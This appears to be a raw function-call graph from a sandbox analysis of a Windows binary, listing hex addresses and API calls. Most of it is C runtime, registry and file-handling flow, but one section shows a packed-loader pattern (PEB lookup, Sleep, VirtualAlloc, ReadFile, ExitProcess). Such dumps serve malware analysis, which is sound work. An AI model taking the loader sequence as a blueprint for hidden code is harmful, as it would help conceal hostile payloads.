16eac2 96966->96967 96968 16eae8 96966->96968 96978 16f2d9 20 API calls _abort 96967->96978 96980 16918d EnterCriticalSection 96968->96980 96971 16eac7 96979 1727ec 26 API calls _abort 96971->96979 96972 16eaf4 96981 16ec0a 62 API calls 2 library calls 96972->96981 96975 16eb08 96982 16eb27 LeaveCriticalSection __fread_nolock 96975->96982 96977 16ead2 __wsopen_s 96977->96964 96978->96971 96979->96977 96980->96972 96981->96975 96982->96977 96986 16e8e1 96983->96986 96985 145118 96985->96876 96987 16e8ed CallCatchBlock 96986->96987 96988 16e900 ___scrt_fastfail 96987->96988 96989 16e92d 96987->96989 96990 16e925 __wsopen_s 96987->96990 96999 16f2d9 20 API calls _abort 96988->96999 97001 16918d EnterCriticalSection 96989->97001 96990->96985 96992 16e937 97002 16e6f8 38 API calls 4 library calls 96992->97002 96995 16e91a 97000 1727ec 26 API calls _abort 96995->97000 96996 16e94e 97003 16e96c LeaveCriticalSection __fread_nolock 96996->97003 96999->96995 97000->96990 97001->96992 97002->96996 97003->96990 97007 16e4e8 97004->97007 97006 1b275d 97006->96878 97010 16e469 97007->97010 97009 16e505 97009->97006 97011 16e48c 97010->97011 97012 16e478 97010->97012 97017 16e488 __alldvrm 97011->97017 97020 17333f 11 API calls 2 library calls 97011->97020 97018 16f2d9 20 API calls _abort 97012->97018 97015 16e47d 97019 1727ec 26 API calls _abort 97015->97019 97017->97009 97018->97015 97019->97017 97020->97017 97025 1b2e7a 97021->97025 97022 1b28fe 27 API calls 97022->97025 97023 1b2d3b 97023->96779 97023->96780 97024 1450f5 40 API calls 97024->97025 97025->97022 97025->97023 97025->97024 97026 14511f 64 API calls 97025->97026 97026->97025 97028 1b22d9 97027->97028 97029 1b22e7 97027->97029 97030 16e5eb 29 API calls 97028->97030 97031 1b232c 97029->97031 97032 16e5eb 29 API calls 97029->97032 97055 1b22f0 97029->97055 97030->97029 97056 1b2557 40 API calls __fread_nolock 97031->97056 97034 1b2311 97032->97034 97034->97031 97036 1b231a 97034->97036 97035 1b2370 97037 1b2395 97035->97037 97038 1b2374 97035->97038 97036->97055 97064 16e678 97036->97064 97057 1b2171 97037->97057 97041 16e678 67 API calls 97038->97041 97042 1b2381 97038->97042 97041->97042 97046 16e678 67 API calls 97042->97046 97042->97055 97043 1b239d 97044 1b23c3 97043->97044 97045 1b23a3 97043->97045 97077 1b23f3 74 API calls 97044->97077 97047 1b23b0 97045->97047 97049 16e678 67 API calls 97045->97049 97046->97055 97050 16e678 67 API calls 97047->97050 97047->97055 97049->97047 97050->97055 97051 1b23de 97054 16e678 67 API calls 97051->97054 97051->97055 97052 1b23ca 97052->97051 97053 16e678 67 API calls 97052->97053 97053->97051 97054->97055 97055->96779 97056->97035 97058 16ea0c ___std_exception_copy 21 API calls 97057->97058 97059 1b217f 97058->97059 97060 16ea0c ___std_exception_copy 21 API calls 97059->97060 97061 1b2190 97060->97061 97062 16ea0c ___std_exception_copy 21 API calls 97061->97062 97063 1b219c 97062->97063 97063->97043 97065 16e684 CallCatchBlock 97064->97065 97066 16e695 97065->97066 97067 16e6aa 97065->97067 97095 16f2d9 20 API calls _abort 97066->97095 97069 16e6a5 __wsopen_s 97067->97069 97078 16918d EnterCriticalSection 97067->97078 97069->97055 97071 16e69a 97096 1727ec 26 API calls _abort 97071->97096 97072 16e6c6 97079 16e602 97072->97079 97075 16e6d1 97097 16e6ee LeaveCriticalSection __fread_nolock 97075->97097 97077->97052 97078->97072 97080 16e624 97079->97080 97081 16e60f 97079->97081 97087 16e61f 97080->97087 97098 16dc0b 97080->97098 97130 16f2d9 20 API calls _abort 97081->97130 97083 16e614 97131 1727ec 26 API calls _abort 97083->97131 97087->97075 97091 16e646 97115 17862f 97091->97115 97094 1729c8 _free 20 API calls 97094->97087 97095->97071 97096->97069 97097->97069 97099 16dc23 97098->97099 97103 16dc1f 97098->97103 97100 16d955 __fread_nolock 26 API calls 97099->97100 97099->97103 97101 16dc43 97100->97101 97132 1759be 62 API calls 5 library calls 97101->97132 97104 174d7a 97103->97104 97105 16e640 97104->97105 97106 174d90 97104->97106 97108 16d955 97105->97108 97106->97105 97107 1729c8 _free 20 API calls 97106->97107 97107->97105 97109 16d976 97108->97109 97110 16d961 97108->97110 97109->97091 97133 16f2d9 20 API calls _abort 97110->97133 97112 16d966 97134 1727ec 26 API calls _abort 97112->97134 97114 16d971 97114->97091 97116 178653 97115->97116 97117 17863e 97115->97117 97118 17868e 97116->97118 97122 17867a 97116->97122 97138 16f2c6 20 API calls _abort 97117->97138 97140 16f2c6 20 API calls _abort 97118->97140 97121 178643 97139 16f2d9 20 API calls _abort 97121->97139 97135 178607 97122->97135 97123 178693 97141 16f2d9 20 API calls _abort 97123->97141 97127 16e64c 97127->97087 97127->97094 97128 17869b 97142 1727ec 26 API calls _abort 97128->97142 97130->97083 97131->97087 97132->97103 97133->97112 97134->97114 97143 178585 97135->97143 97137 17862b 97137->97127 97138->97121 97139->97127 97140->97123 97141->97128 97142->97127 97144 178591 CallCatchBlock 97143->97144 97154 175147 EnterCriticalSection 97144->97154 97146 17859f 97147 1785c6 97146->97147 97148 1785d1 97146->97148 97155 1786ae 97147->97155 97170 16f2d9 20 API calls _abort 97148->97170 97151 1785cc 97171 1785fb LeaveCriticalSection __wsopen_s 97151->97171 97153 1785ee __wsopen_s 97153->97137 97154->97146 97172 1753c4 97155->97172 97157 1786c4 97185 175333 21 API calls 3 library calls 97157->97185 97159 1786be 97159->97157 97160 1786f6 97159->97160 97163 1753c4 __wsopen_s 26 API calls 97159->97163 97160->97157 97161 1753c4 __wsopen_s 26 API calls 97160->97161 97164 178702 CloseHandle 97161->97164 97162 17871c 97165 17873e 97162->97165 97186 16f2a3 20 API calls 2 library calls 97162->97186 97166 1786ed 97163->97166 97164->97157 97167 17870e GetLastError 97164->97167 97165->97151 97169 1753c4 __wsopen_s 26 API calls 97166->97169 97167->97157 97169->97160 97170->97151 97171->97153 97173 1753d1 97172->97173 97176 1753e6 97172->97176 97187 16f2c6 20 API calls _abort 97173->97187 97175 1753d6 97188 16f2d9 20 API calls _abort 97175->97188 97180 17540b 97176->97180 97189 16f2c6 20 API calls _abort 97176->97189 97178 175416 97190 16f2d9 20 API calls _abort 97178->97190 97180->97159 97182 1753de 97182->97159 97183 17541e 97191 1727ec 26 API calls _abort 97183->97191 97185->97162 97186->97165 97187->97175 97188->97182 97189->97178 97190->97183 97191->97182 97192 f4cd10 97206 f4a960 97192->97206 97194 f4cdbd 97209 f4cc00 97194->97209 97196 f4cde6 CreateFileW 97198 f4ce35 97196->97198 97199 f4ce3a 97196->97199 97199->97198 97200 f4ce51 VirtualAlloc 97199->97200 97200->97198 97201 f4ce6f ReadFile 97200->97201 97201->97198 97202 f4ce8a 97201->97202 97203 f4bc00 13 API calls 97202->97203 97204 f4cebd 97203->97204 97205 f4cee0 ExitProcess 97204->97205 97205->97198 97212 f4dde0 GetPEB 97206->97212 97208 f4afeb 97208->97194 97210 f4cc09 Sleep 97209->97210 97211 f4cc17 97210->97211 97213 f4de0a 97212->97213 97213->97208 97214 141033 97219 144c91 97214->97219 97218 141042 97220 14a961 22 API calls 97219->97220 97221 144cff 97220->97221 97227 143af0 97221->97227 97224 144d9c 97225 141038 97224->97225 97230 1451f7 22 API calls __fread_nolock 97224->97230 97226 1600a3 29 API calls __onexit 97225->97226 97226->97218 97231 143b1c 97227->97231 97230->97224 97232 143b0f 97231->97232 97233 143b29 97231->97233 97232->97224 97233->97232 97234 143b30 RegOpenKeyExW 97233->97234 97234->97232 97235 143b4a RegQueryValueExW 97234->97235 97236 143b80 RegCloseKey 97235->97236 97237 143b6b 97235->97237 97236->97232 97237->97236 97238 14f7bf 97239 14fcb6 97238->97239 97240 14f7d3 97238->97240 97330 14aceb 23 API calls ISource 97239->97330 97242 14fcc2 97240->97242 97243 15fddb 22 API calls 97240->97243 97331 14aceb 23 API calls ISource 97242->97331 97245 14f7e5 97243->97245 97245->97242 97246 14f83e 97245->97246 97247 14fd3d 97245->97247 97264 14ed9d ISource 97246->97264 97273 151310 97246->97273 97332 1b1155 22 API calls 97247->97332 97250 14fef7 97259 14a8c7 22 API calls 97250->97259 97250->97264 97252 15fddb 22 API calls 97271 14ec76 ISource 97252->97271 97254 194b0b 97334 1b359c 82 API calls __wsopen_s 97254->97334 97255 14a8c7 22 API calls 97255->97271 97256 194600 97262 14a8c7 22 API calls 97256->97262 97256->97264 97259->97264 97261 160242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97261->97271 97262->97264 97263 14fbe3 97263->97264 97267 194bdc 97263->97267 97272 14f3ae ISource 97263->97272 97265 14a961 22 API calls 97265->97271 97266 1600a3 29 API calls pre_c_initialization 97266->97271 97335 1b359c 82 API calls __wsopen_s 97267->97335 97269 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97269->97271 97270 194beb 97336 1b359c 82 API calls __wsopen_s 97270->97336 97271->97250 97271->97252 97271->97254 97271->97255 97271->97256 97271->97261 97271->97263 97271->97264 97271->97265 97271->97266 97271->97269 97271->97270 97271->97272 97328 1501e0 207 API calls 2 library calls 97271->97328 97329 1506a0 41 API calls ISource 97271->97329 97272->97264 97333 1b359c 82 API calls __wsopen_s 97272->97333 97274 151376 97273->97274 97275 1517b0 97273->97275 97277 196331 97274->97277 97278 151940 9 API calls 97274->97278 97528 160242 5 API calls __Init_thread_wait 97275->97528 97463 1c709c 97277->97463 97281 1513a0 97278->97281 97279 1517ba 97282 1517fb 97279->97282 97285 149cb3 22 API calls 97279->97285 97284 151940 9 API calls 97281->97284 97287 196346 97282->97287 97289 15182c 97282->97289 97283 19633d 97283->97271 97286 1513b6 97284->97286 97293 1517d4 97285->97293 97286->97282 97288 1513ec 97286->97288 97533 1b359c 82 API calls __wsopen_s 97287->97533 97288->97287 97294 151408 __fread_nolock 97288->97294 97530 14aceb 23 API calls ISource 97289->97530 97292 151839 97531 15d217 207 API calls 97292->97531 97529 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97293->97529 97294->97292 97297 19636e 97294->97297 97304 15fddb 22 API calls 97294->97304 97305 15fe0b 22 API calls 97294->97305 97312 15152f 97294->97312 97315 1963b2 97294->97315 97320 1515c7 ISource 97294->97320 97503 14ec40 97294->97503 97534 1b359c 82 API calls __wsopen_s 97297->97534 97299 1963d1 97536 1c5745 54 API calls _wcslen 97299->97536 97300 15153c 97301 151940 9 API calls 97300->97301 97303 151549 97301->97303 97307 151940 9 API calls 97303->97307 97303->97320 97304->97294 97305->97294 97306 151872 97306->97277 97532 15faeb 23 API calls 97306->97532 97317 151563 97307->97317 97310 15171d 97310->97271 97312->97299 97312->97300 97313 15167b ISource 97313->97310 97527 15ce17 22 API calls ISource 97313->97527 97535 1b359c 82 API calls __wsopen_s 97315->97535 97319 14a8c7 22 API calls 97317->97319 97317->97320 97319->97320 97320->97306 97320->97313 97337 151940 97320->97337 97347 1b83da 97320->97347 97350 146216 97320->97350 97355 1c958b 97320->97355 97358 1b744a 97320->97358 97414 1bf0ec 97320->97414 97423 146246 97320->97423 97427 1ce204 97320->97427 97537 1b359c 82 API calls __wsopen_s 97320->97537 97328->97271 97329->97271 97330->97242 97331->97247 97332->97264 97333->97264 97334->97264 97335->97270 97336->97264 97338 151981 97337->97338 97342 15195d 97337->97342 97538 160242 5 API calls __Init_thread_wait 97338->97538 97340 15198b 97340->97342 97539 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97340->97539 97346 15196e 97342->97346 97540 160242 5 API calls __Init_thread_wait 97342->97540 97343 158727 97343->97346 97541 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97343->97541 97346->97320 97542 1b98e3 97347->97542 97349 1b83ea 97349->97320 97351 146246 CloseHandle 97350->97351 97352 14621e 97351->97352 97353 146246 CloseHandle 97352->97353 97354 14622d ISource 97353->97354 97354->97320 97644 1c7f59 97355->97644 97357 1c959b 97357->97320 97359 1b7474 97358->97359 97360 1b7469 97358->97360 97363 14a961 22 API calls 97359->97363 97395 1b7554 97359->97395 97737 14b567 39 API calls 97360->97737 97362 15fddb 22 API calls 97364 1b7587 97362->97364 97365 1b7495 97363->97365 97366 15fe0b 22 API calls 97364->97366 97367 14a961 22 API calls 97365->97367 97368 1b7598 97366->97368 97369 1b749e 97367->97369 97370 146246 CloseHandle 97368->97370 97371 147510 53 API calls 97369->97371 97372 1b75a3 97370->97372 97373 1b74aa 97371->97373 97374 14a961 22 API calls 97372->97374 97738 14525f 22 API calls 97373->97738 97376 1b75ab 97374->97376 97378 146246 CloseHandle 97376->97378 97377 1b74bf 97380 146350 22 API calls 97377->97380 97379 1b75b2 97378->97379 97381 147510 53 API calls 97379->97381 97382 1b74f2 97380->97382 97383 1b75be 97381->97383 97384 1b754a 97382->97384 97739 1ad4ce lstrlenW GetFileAttributesW FindFirstFileW FindClose 97382->97739 97385 146246 CloseHandle 97383->97385 97741 14b567 39 API calls 97384->97741 97387 1b75c8 97385->97387 97392 145745 5 API calls 97387->97392 97389 1b7502 97389->97384 97390 1b7506 97389->97390 97391 149cb3 22 API calls 97390->97391 97393 1b7513 97391->97393 97394 1b75e2 97392->97394 97740 1ad2c1 26 API calls 97393->97740 97397 1b75ea 97394->97397 97398 1b76de GetLastError 97394->97398 97395->97362 97412 1b76a4 97395->97412 97742 1453de 27 API calls ISource 97397->97742 97400 1b76f7 97398->97400 97399 1b751c 97399->97384 97402 146216 CloseHandle 97400->97402 97402->97412 97403 1b75f8 97743 1453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97403->97743 97405 1b7645 97407 15fddb 22 API calls 97405->97407 97406 1b75ff 97406->97405 97410 1accff 4 API calls 97406->97410 97408 1b7679 97407->97408 97409 14a961 22 API calls 97408->97409 97411 1b7686 97409->97411 97410->97405 97411->97412 97744 1a417d 22 API calls __fread_nolock 97411->97744 97412->97320 97415 147510 53 API calls 97414->97415 97416 1bf126 97415->97416 97745 149e90 97416->97745 97418 1bf136 97419 14ec40 207 API calls 97418->97419 97421 1bf15b 97418->97421 97419->97421 97422 1bf15f 97421->97422 97773 149c6e 22 API calls 97421->97773 97422->97320 97424 146250 97423->97424 97425 14625f 97423->97425 97424->97320 97425->97424 97426 146264 CloseHandle 97425->97426 97426->97424 97428 14a961 22 API calls 97427->97428 97429 1ce21b 97428->97429 97430 147510 53 API calls 97429->97430 97431 1ce22a 97430->97431 97432 146270 22 API calls 97431->97432 97433 1ce23d 97432->97433 97434 147510 53 API calls 97433->97434 97435 1ce24a 97434->97435 97436 1ce2c7 97435->97436 97437 1ce262 97435->97437 97438 147510 53 API calls 97436->97438 97808 14b567 39 API calls 97437->97808 97440 1ce2cc 97438->97440 97442 1ce2d9 97440->97442 97443 1ce314 97440->97443 97441 1ce267 97441->97442 97445 1ce280 97441->97445 97811 149c6e 22 API calls 97442->97811 97446 1ce32c 97443->97446 97812 14b567 39 API calls 97443->97812 97809 146d25 22 API calls __fread_nolock 97445->97809 97448 1ce345 97446->97448 97813 14b567 39 API calls 97446->97813 97451 14a8c7 22 API calls 97448->97451 97453 1ce35f 97451->97453 97452 1ce28d 97454 146350 22 API calls 97452->97454 97789 1a92c8 97453->97789 97457 1ce29b 97454->97457 97456 1ce2e6 97456->97320 97810 146d25 22 API calls __fread_nolock 97457->97810 97459 1ce2c2 97814 1462b5 22 API calls 97459->97814 97460 1ce2b4 97461 146350 22 API calls 97460->97461 97461->97459 97464 1c70db 97463->97464 97465 1c70f5 97463->97465 97829 1b359c 82 API calls __wsopen_s 97464->97829 97818 1c5689 97465->97818 97469 14ec40 206 API calls 97470 1c7164 97469->97470 97471 1c71ff 97470->97471 97475 1c71a6 97470->97475 97496 1c70ed 97470->97496 97472 1c7205 97471->97472 97473 1c7253 97471->97473 97830 1b1119 22 API calls 97472->97830 97474 147510 53 API calls 97473->97474 97473->97496 97476 1c7265 97474->97476 97480 1b0acc 22 API calls 97475->97480 97478 14aec9 22 API calls 97476->97478 97482 1c7289 CharUpperBuffW 97478->97482 97479 1c7228 97831 14a673 22 API calls 97479->97831 97481 1c71de 97480->97481 97484 151310 206 API calls 97481->97484 97486 1c72a3 97482->97486 97484->97496 97485 1c7230 97832 14bf40 207 API calls 2 library calls 97485->97832 97487 1c72aa 97486->97487 97488 1c72f6 97486->97488 97825 1b0acc 97487->97825 97489 147510 53 API calls 97488->97489 97491 1c72fe 97489->97491 97833 15e300 23 API calls 97491->97833 97495 151310 206 API calls 97495->97496 97496->97283 97497 1c7308 97497->97496 97498 147510 53 API calls 97497->97498 97499 1c7323 97498->97499 97834 14a673 22 API calls 97499->97834 97501 1c7333 97835 14bf40 207 API calls 2 library calls 97501->97835 97522 14ec76 ISource 97503->97522 97504 1600a3 29 API calls pre_c_initialization 97504->97522 97505 15fddb 22 API calls 97505->97522 97506 14fef7 97513 14a8c7 22 API calls 97506->97513 97520 14ed9d ISource 97506->97520 97509 194b0b 97840 1b359c 82 API calls __wsopen_s 97509->97840 97510 194600 97517 14a8c7 22 API calls 97510->97517 97510->97520 97513->97520 97515 160242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97515->97522 97516 14a8c7 22 API calls 97516->97522 97517->97520 97518 14fbe3 97518->97520 97521 194bdc 97518->97521 97526 14f3ae ISource 97518->97526 97519 14a961 22 API calls 97519->97522 97520->97294 97841 1b359c 82 API calls __wsopen_s 97521->97841 97522->97504 97522->97505 97522->97506 97522->97509 97522->97510 97522->97515 97522->97516 97522->97518 97522->97519 97522->97520 97524 194beb 97522->97524 97525 1601f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97522->97525 97522->97526 97837 1501e0 207 API calls 2 library calls 97522->97837 97838 1506a0 41 API calls ISource 97522->97838 97842 1b359c 82 API calls __wsopen_s 97524->97842 97525->97522 97526->97520 97839 1b359c 82 API calls __wsopen_s 97526->97839 97527->97313 97528->97279 97529->97282 97530->97292 97531->97306 97532->97306 97533->97320 97534->97320 97535->97320 97536->97317 97537->97320 97538->97340 97539->97342 97540->97343 97541->97346 97543 1b99e8 97542->97543 97544 1b9902 97542->97544 97634 1b9caa 39 API calls 97543->97634 97546 15fddb 22 API calls 97544->97546 97547 1b9909 97546->97547 97548 15fe0b 22 API calls 97547->97548 97549 1b991a 97548->97549 97552 146246 CloseHandle 97549->97552 97550 1b9ac5 97593 1b1e96 97550->97593 97551 1b99a2 97551->97550 97555 1b99ca 97551->97555 97558 1b9a33 97551->97558 97554 1b9925 97552->97554 97557 14a961 22 API calls 97554->97557 97555->97349 97556 1b9acc 97597 1accff 97556->97597 97559 1b992d 97557->97559 97561 147510 53 API calls 97558->97561 97560 146246 CloseHandle 97559->97560 97562 1b9934 97560->97562 97571 1b9a3a 97561->97571 97601 147510 97562->97601 97565 1b9abb 97636 1acd57 30 API calls 97565->97636 97568 1b9a6e 97570 146270 22 API calls 97568->97570 97569 146246 CloseHandle 97573 1b994a 97569->97573 97574 1b9a7e 97570->97574 97571->97565 97571->97568 97572 146246 CloseHandle 97575 1b9b1e 97572->97575 97624 145745 97573->97624 97577 1b9a8e 97574->97577 97580 14a8c7 22 API calls 97574->97580 97578 146216 CloseHandle 97575->97578 97581 1433c6 22 API calls 97577->97581 97578->97555 97580->97577 97584 1b9a9c 97581->97584 97582 1b995d 97632 1453de 27 API calls ISource 97582->97632 97583 1b99c2 97585 146216 CloseHandle 97583->97585 97635 1acd57 30 API calls 97584->97635 97585->97555 97587 1b9aa8 97587->97555 97587->97572 97589 1b996b 97633 1453c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97589->97633 97591 1b9972 97591->97551 97592 1accff 4 API calls 97591->97592 97592->97551 97594 1b1e9f 97593->97594 97595 1b1ea4 97593->97595 97637 1b0f67 24 API calls __fread_nolock 97594->97637 97595->97556 97598 1acd19 WriteFile 97597->97598 97599 1acd0e 97597->97599 97598->97587 97638 1acc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97599->97638 97602 147525 97601->97602 97619 147522 97601->97619 97603 14752d 97602->97603 97604 14755b 97602->97604 97639 1651c6 26 API calls 97603->97639 97606 1850f6 97604->97606 97609 14756d 97604->97609 97615 18500f 97604->97615 97642 165183 26 API calls 97606->97642 97607 14753d 97614 15fddb 22 API calls 97607->97614 97640 15fb21 51 API calls 97609->97640 97610 185088 97641 15fb21 51 API calls 97610->97641 97611 18510e 97611->97611 97616 147547 97614->97616 97615->97610 97618 15fe0b 22 API calls 97615->97618 97617 149cb3 22 API calls 97616->97617 97617->97619 97620 185058 97618->97620 97619->97569 97621 15fddb 22 API calls 97620->97621 97622 18507f 97621->97622 97623 149cb3 22 API calls 97622->97623 97623->97610 97625 14575c CreateFileW 97624->97625 97626 184035 97624->97626 97627 14577b 97625->97627 97626->97627 97628 18403b CreateFileW 97626->97628 97627->97582 97627->97583 97628->97627 97629 184063 97628->97629 97643 1454c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97629->97643 97631 18406e 97631->97627 97632->97589 97633->97591 97634->97551 97635->97587 97636->97587 97637->97595 97638->97598 97639->97607 97640->97607 97641->97606 97642->97611 97643->97631 97645 147510 53 API calls 97644->97645 97646 1c7f90 97645->97646 97647 1c7fd5 ISource 97646->97647 97682 1c8cd3 97646->97682 97647->97357 97649 1c844f 97723 1c8ee4 60 API calls 97649->97723 97652 1c845e 97653 1c846a 97652->97653 97654 1c828f 97652->97654 97653->97647 97695 1c7e86 97654->97695 97655 147510 53 API calls 97673 1c8049 97655->97673 97660 1c82c8 97710 15fc70 97660->97710 97663 1c82e8 97716 1b359c 82 API calls __wsopen_s 97663->97716 97664 1c8302 97717 1463eb 22 API calls 97664->97717 97667 1c82f3 GetCurrentProcess TerminateProcess 97667->97664 97668 1c8281 97668->97649 97668->97654 97669 1c8311 97718 146a50 22 API calls 97669->97718 97671 1c832a 97680 1c8352 97671->97680 97719 1504f0 22 API calls 97671->97719 97673->97647 97673->97655 97673->97668 97714 1a417d 22 API calls __fread_nolock 97673->97714 97715 1c851d 42 API calls _strftime 97673->97715 97674 1c84c5 97674->97647 97678 1c84d9 FreeLibrary 97674->97678 97675 1c8341 97720 1c8b7b 75 API calls 97675->97720 97678->97647 97680->97674 97721 1504f0 22 API calls 97680->97721 97722 14aceb 23 API calls ISource 97680->97722 97724 1c8b7b 75 API calls 97680->97724 97683 14aec9 22 API calls 97682->97683 97684 1c8cee CharLowerBuffW 97683->97684 97725 1a8e54 97684->97725 97688 14a961 22 API calls 97689 1c8d2a 97688->97689 97732 146d25 22 API calls __fread_nolock 97689->97732 97691 1c8d3e 97692 1493b2 22 API calls 97691->97692 97693 1c8d48 _wcslen 97692->97693 97694 1c8e5e _wcslen 97693->97694 97733 1c851d 42 API calls _strftime 97693->97733 97694->97673 97696 1c7ea1 97695->97696 97697 1c7eec 97695->97697 97698 15fe0b 22 API calls 97696->97698 97701 1c9096 97697->97701 97699 1c7ec3 97698->97699 97699->97697 97700 15fddb 22 API calls 97699->97700 97700->97699 97702 1c92ab ISource 97701->97702 97708 1c90ba _strcat _wcslen 97701->97708 97702->97660 97703 14b567 39 API calls 97703->97708 97704 14b38f 39 API calls 97704->97708 97705 14b6b5 39 API calls 97705->97708 97706 147510 53 API calls 97706->97708 97707 16ea0c 21 API calls ___std_exception_copy 97707->97708 97708->97702 97708->97703 97708->97704 97708->97705 97708->97706 97708->97707 97736 1aefae 24 API calls _wcslen 97708->97736 97712 15fc85 97710->97712 97711 15fd1d VirtualProtect 97713 15fceb 97711->97713 97712->97711 97712->97713 97713->97663 97713->97664 97714->97673 97715->97673 97716->97667 97717->97669 97718->97671 97719->97675 97720->97680 97721->97680 97722->97680 97723->97652 97724->97680 97726 1a8e74 _wcslen 97725->97726 97727 1a8f63 97726->97727 97730 1a8ea9 97726->97730 97731 1a8f68 97726->97731 97727->97688 97727->97693 97730->97727 97734 15ce60 41 API calls 97730->97734 97731->97727 97735 15ce60 41 API calls 97731->97735 97732->97691 97733->97694 97734->97730 97735->97731 97736->97708 97737->97359 97738->97377 97739->97389 97740->97399 97741->97395 97742->97403 97743->97406 97744->97412 97746 146270 22 API calls 97745->97746 97751 149eb5 97746->97751 97747 149fd2 97775 14a4a1 97747->97775 97749 149fec 97749->97418 97751->97747 97753 14a12c __fread_nolock 97751->97753 97754 18f7c4 97751->97754 97756 14a405 97751->97756 97757 18f699 97751->97757 97759 14a6c3 22 API calls 97751->97759 97768 14a587 22 API calls 97751->97768 97769 14aec9 22 API calls 97751->97769 97770 14a4a1 22 API calls 97751->97770 97774 144573 41 API calls _wcslen 97751->97774 97784 1448c8 23 API calls 97751->97784 97785 1449bd 22 API calls __fread_nolock 97751->97785 97786 14a673 22 API calls 97751->97786 97753->97754 97753->97756 97787 1a96e2 84 API calls __wsopen_s 97754->97787 97756->97749 97788 1a96e2 84 API calls __wsopen_s 97756->97788 97762 15fddb 22 API calls 97757->97762 97759->97751 97761 18f7d2 97763 14a4a1 22 API calls 97761->97763 97764 18f754 97762->97764 97765 18f7e8 97763->97765 97766 15fe0b 22 API calls 97764->97766 97765->97749 97766->97753 97768->97751 97771 14a0db CharUpperBuffW 97769->97771 97770->97751 97783 14a673 22 API calls 97771->97783 97773->97422 97774->97751 97776 14a52b 97775->97776 97782 14a4b1 __fread_nolock 97775->97782 97778 15fe0b 22 API calls 97776->97778 97777 15fddb 22 API calls 97779 14a4b8 97777->97779 97778->97782 97780 15fddb 22 API calls 97779->97780 97781 14a4d6 97779->97781 97780->97781 97781->97749 97782->97777 97783->97751 97784->97751 97785->97751 97786->97751 97787->97761 97788->97749 97790 14a961 22 API calls 97789->97790 97791 1a92de 97790->97791 97792 146270 22 API calls 97791->97792 97793 1a92f2 97792->97793 97794 1a8e54 41 API calls 97793->97794 97799 1a9314 97793->97799 97796 1a930e 97794->97796 97795 1a8e54 41 API calls 97795->97799 97796->97799 97815 146d25 22 API calls __fread_nolock 97796->97815 97799->97795 97800 1a93b3 97799->97800 97801 146350 22 API calls 97799->97801 97804 1a9397 97799->97804 97816 146d25 22 API calls __fread_nolock 97799->97816 97802 14a8c7 22 API calls 97800->97802 97803 1a93c2 97800->97803 97801->97799 97802->97803 97803->97459 97817 146d25 22 API calls __fread_nolock 97804->97817 97806 1a93a7 97807 146350 22 API calls 97806->97807 97807->97800 97808->97441 97809->97452 97810->97460 97811->97456 97812->97446 97813->97448 97814->97456 97815->97799 97816->97799 97817->97806 97819 1c56a4 97818->97819 97824 1c56f2 97818->97824 97820 15fe0b 22 API calls 97819->97820 97821 1c56c6 97820->97821 97822 15fddb 22 API calls 97821->97822 97821->97824 97836 1b0a59 22 API calls 97821->97836 97822->97821 97824->97469 97826 1b0ada 97825->97826 97828 1b0b13 97825->97828 97827 15fddb 22 API calls 97826->97827 97826->97828 97827->97828 97828->97495 97829->97496 97830->97479 97831->97485 97832->97496 97833->97497 97834->97501 97835->97496 97836->97821 97837->97522 97838->97522 97839->97520 97840->97520 97841->97524 97842->97520 97843 141098 97848 1442de 97843->97848 97847 1410a7 97849 14a961 22 API calls 97848->97849 97850 1442f5 GetVersionExW 97849->97850 97851 146b57 22 API calls 97850->97851 97852 144342 97851->97852 97853 1493b2 22 API calls 97852->97853 97862 144378 97852->97862 97854 14436c 97853->97854 97856 1437a0 22 API calls 97854->97856 97855 14441b GetCurrentProcess IsWow64Process 97857 144437 97855->97857 97856->97862 97858 14444f LoadLibraryA 97857->97858 97859 183824 GetSystemInfo 97857->97859 97860 144460 GetProcAddress 97858->97860 97861 14449c GetSystemInfo 97858->97861 97860->97861 97863 144470 GetNativeSystemInfo 97860->97863 97864 144476 97861->97864 97862->97855 97865 1837df 97862->97865 97863->97864 97866 14109d 97864->97866 97867 14447a FreeLibrary 97864->97867 97868 1600a3 29 API calls __onexit 97866->97868 97867->97866 97868->97847 97869 1603fb 97870 160407 CallCatchBlock 97869->97870 97898 15feb1 97870->97898 97872 16040e 97873 160561 97872->97873 97876 160438 97872->97876 97925 16083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97873->97925 97875 160568 97926 164e52 28 API calls _abort 97875->97926 97887 160477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97876->97887 97909 17247d 97876->97909 97878 16056e 97927 164e04 28 API calls _abort 97878->97927 97882 160576 97883 160457 97885 1604d8 97917 160959 97885->97917 97887->97885 97921 164e1a 38 API calls 2 library calls 97887->97921 97889 1604de 97890 1604f3 97889->97890 97922 160992 GetModuleHandleW 97890->97922 97892 1604fa 97892->97875 97893 1604fe 97892->97893 97894 160507 97893->97894 97923 164df5 28 API calls _abort 97893->97923 97924 160040 13 API calls 2 library calls 97894->97924 97897 16050f 97897->97883 97899 15feba 97898->97899 97928 160698 IsProcessorFeaturePresent 97899->97928 97901 15fec6 97929 162c94 10 API calls 3 library calls 97901->97929 97903 15fecb 97908 15fecf 97903->97908 97930 172317 97903->97930 97905 15fee6 97905->97872 97908->97872 97912 172494 97909->97912 97910 160a8c CatchGuardHandler 5 API calls 97911 160451 97910->97911 97911->97883 97913 172421 97911->97913 97912->97910 97914 172450 97913->97914 97915 160a8c CatchGuardHandler 5 API calls 97914->97915 97916 172479 97915->97916 97916->97887 97989 162340 97917->97989 97920 16097f 97920->97889 97921->97885 97922->97892 97923->97894 97924->97897 97925->97875 97926->97878 97927->97882 97928->97901 97929->97903 97934 17d1f6 97930->97934 97933 162cbd 8 API calls 3 library calls 97933->97908 97935 17d213 97934->97935 97937 17d20f 97934->97937 97935->97937 97940 174bfb 97935->97940 97952 160a8c 97937->97952 97938 15fed8 